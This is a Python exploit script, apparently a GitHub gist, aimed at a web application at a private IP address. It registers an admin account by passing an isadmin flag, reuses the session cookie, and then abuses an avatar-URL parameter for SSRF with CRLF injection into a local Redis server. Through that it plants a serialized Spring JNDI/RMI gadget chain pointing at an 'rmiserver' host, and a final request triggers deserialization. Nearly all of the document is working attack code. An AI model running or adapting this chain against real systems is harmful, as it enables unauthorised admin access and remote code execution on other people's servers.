/show_me_the_shell.py
Created May 26, 2018
| import requests | |
| def register(url): | |
| reg_url = url + '/doregister.do' | |
| post_data = {'username':'admin','password':'admin123','repassword':'admin123','isadmin':'1'} | |
| resp = requests.post(url=reg_url,data=post_data) | |
| def login(url): | |
| req = requests.Session() | |
| login_url = url + '/login.do' | |
| post_data = {'username':'admin','password':'admin123'} | |
| response = req.post(url=login_url,data=post_data,allow_redirects=False) | |
| cookie_value = response.headers['Set-Cookie'] | |
| last_cookie = cookie_value.split(';')[0].split('=')[1] | |
| return last_cookie | |
| def exploit(url,cookie_value): | |
| headers = {'Cookie':'JSESSIONID={cookie_value}'.format(cookie_value=cookie_value)} | |
| step1 = {"url":"http://127.0.0.1\r\n\r\nset post27 \"\\x01\\x00java.util.HashMa\\xf0\\x01\\x02\\x01\\x01\\xc2\\x01org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\\x01\\x01rmi\"\r\n\r\n:6379/1.jpg"} | |
| step2 = {"url":"http://127.0.0.1\r\n\r\neval \"return redis.call('append','post27',string.char(0x3a,0x2f,0x2f))\" 0\r\n\r\n:6379/1.jpg"} | |
| step3 = {"url":"http://127.0.0.1\r\n\r\nappend post27 rmiserver\r\n\r\n:6379/1.jpg"} | |
| step4 = {"url":"http://127.0.0.1\r\n\r\neval \"return redis.call('append','post27',string.char(0x2f))\" 0\r\n\r\n:6379/1.jpg"} | |
| step5 = {"url":"http://127.0.0.1\r\n\r\nappend post27 \"Objec\\xf4\\x01\\x02org.springframework.jndi.support.SimpleJndiBeanFactor\\xf9\\x01\\x01\\x03org.springframework.jndi.JndiTemplat\\xe5\\x01\\x00\\x01\\x04org.apache.commons.logging.impl.NoOpLo\\xe7\\x01\\x01\\x04\\x01\\x01\\x01\\x00\\x01\\x00\\x01\\x05java.util.HashSe\\xf4\\x01\\x01\\x03\\x04\\x01\\x00\\x01\\x00\\x00\\x01\\x06org.springframework.aop.TruePointcu\\xf4\\x01\\x01\\x01\\x03\\x01\\x01\\x01\\x00\\x00\\x00\\x01\\x06\\x0c\\x01\\x01\\n\"\r\n\r\n:6379/1.jpg"} | |
| steplist = [step1,step2,step3,step4,step5] | |
| for step in steplist: | |
| exploit_url = url + '/user/headimg.do' | |
| resp = requests.get(url=exploit_url,headers=headers,params=step) | |
| resp = requests.get(url=url+'/manage/check.do?pid=27',headers=headers) | |
| if __name__ == '__main__': | |
| url = 'http://192.168.201.25' | |
| register(url) | |
| cookie=login(url) | |
| exploit(url,cookie) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment